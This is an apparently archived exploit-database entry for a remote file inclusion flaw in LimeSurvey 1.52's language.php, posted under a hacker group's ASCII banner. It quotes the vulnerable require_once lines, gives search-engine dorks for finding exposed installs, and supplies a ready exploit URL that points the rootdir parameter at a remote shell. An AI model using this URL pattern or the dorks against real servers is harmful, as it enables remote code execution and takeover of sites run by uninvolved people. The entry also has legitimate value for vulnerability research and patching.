ad

LimeSurvey <= 1.52 (language.php) Remote File Inclusion Vulnerability



EDB-ID: 4544 CVE: 2007-5573 OSVDB-ID: 37913
Author: S.W.A.T. Published: 2007-10-17 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
                      \\\|///
                    \\  - -  //      Xmors Underground Group
                     (  @ @ )
              ----oOOo--(_)-oOOo--------------------------------------------------
              Portal   :  LimeSurvey (PHPSurveyor) 1.52 plus_build 2007.10.16
              Download :  http://garr.dl.sourceforge.net/sourceforge/limesurvey/limesurvey152plus_build3386_20071016.zip
	      Author   :  S.W.A.T.
	      HomePage :  wWw.XmorS.CoM
	      Type     :  Remote File Inclusion
              Y! ID    :  Svvateam
              E-Mail   :  Svvateam@yahoo.com / S.W.4.T@hackermail.com
              Dork     :  "You have not provided a survey identification number"
              Dork2    :  "LimeSurvey"
              ----ooooO-----Ooooo--------------------------------------------------
                  (   )     (   )
                   \ (       ) /
                    \_)     (_/

+---------------------------------------------------------------------------------------------+

Vuln Code :

require_once($rootdir.'/classes/php-gettext/gettext.php');

require_once($rootdir.'/classes/php-gettext/streams.php');

+---------------------------------------------------------------------------------------------+
+---------------------------------------------------------------------------------------------+

Exploit :

http://[TARGET]/[PATH]/classes/core/language.php?rootdir=[-Sh3ll-]


+---------------------------------------------------------------------------------------------+

# milw0rm.com [2007-10-17]